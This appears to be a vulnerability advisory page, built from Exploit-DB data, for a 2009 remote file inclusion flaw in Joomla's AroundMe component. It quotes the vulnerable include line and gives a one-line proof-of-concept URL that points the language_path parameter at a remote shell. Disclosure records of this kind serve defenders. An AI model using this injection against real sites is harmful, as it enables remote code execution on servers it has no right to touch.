3rr0r: ./aroundme_1_1/aroundme/components/core/connect.php (line 25)

vendor:

AroundMe Component

by:

cr4wl3r

7.5

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: AroundMe Component

Affected Version From: 1.5.2000

Affected Version To: 1.5.2000

Patch Exists: NO

Related CWE: N/A

CPE: a:joomla:joomla:1.5.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

3rr0r: ./aroundme_1_1/aroundme/components/core/connect.php (line 25)

A remote file inclusion vulnerability exists in the AroundMe component for Joomla! 1.5.0. The vulnerability is due to the application including a file specified in the language_path parameter of the connect.php script. This can be exploited to execute arbitrary PHP code by including a malicious file from a remote location.

Mitigation:

Input validation should be used to ensure that user-supplied data is not used to include files from external sources.

Source

Exploit-DB raw data:

   [ Discovered by cr4wl3r \ Indonesian Hacker ]

########################################################################
3rr0r: ./aroundme_1_1/aroundme/components/core/connect.php (line 25)

       <?php
           include_once($language_path . 'connect.lang.php');
       ?>
########################################################################

########################################################################
PoC  :   http://server/[path]/components/core/connect.php?language_path=[Shell]
########################################################################

########################################################################
#Contact Me : cr4wl3r[4t]linuxmail[dot]org
########################################################################


   [ Gorontalo / 2009 ]